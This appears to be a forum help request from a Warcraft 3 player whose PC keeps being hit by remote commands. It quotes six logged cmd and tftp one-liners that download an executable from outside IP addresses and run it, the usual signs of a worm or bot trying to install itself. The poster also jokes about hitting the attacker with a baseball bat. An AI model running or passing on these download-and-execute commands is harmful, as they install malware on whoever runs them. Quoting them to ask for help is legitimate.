I use an ADSL Router as a PPPOE modem, dailing out to allow my PC to get an IP. I unfortunately needs an IP to allow me to create games in Warcraft 3 (I am a DOTA addict).
While I can use my router to dail out, use the internal firewall, open the required ports and forwarding the ports to one PC, it will limit me to only using one PC for games. I however tried it, and the idiot still gets through.
I scanned my PC with NOD32, AVG, Norton and Mcafee, could not find any virusses, spyware or other threads. I currently use ZoneAlarm and AVG on my PC.
Somehow the person manages to activate my 'START - RUN', he types in either command and then try to open a ftp port to a certain address to download a program, or similar. Fortunately I just disabled FTP on my PC, so Zone Alarm just closes it automatically.
Yes, it happens 20 - 30 times a day, and it kills my gaming, as my PC switches to the desktop while it is happening. The result is that I frequently die as the game is still continuing in the background. Quite frustrating.
Typical commands includes:
Code: Select all
cmd /c echo OPEN 41.242.239.23 30534>x&echo GET 84785_2pac.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_2pac.exe&del x&exit
cmd /c echo OPEN 41.242.94.73 33136>x&echo GET 84785_2pac.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_2pac.exe&del x&exit
cmd /c echo OPEN 41.242.29.170 5969>x&echo GET 84785_2pac.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_2pac.exe&del x&exit
cmd /c echo OPEN 41.242.114.134 10285>x&echo GET 84785_2pac.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_2pac.exe&del x&exit
%comspec% /c tftp -i 83.226.184.184 GET unaea.exe & start unaea
cmd /c echo OPEN 41.242.53.17 21103>x&echo GET 84785_2pac.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_2pac.exe&del x&exit
- What the guy wants to do,
- What is the 84785_2pac.exe program (googled it, no info),
- An idea how I can stop it,
- An idea how I can trace the guy causing it (I have a baseball bat that I would like to introduce to him)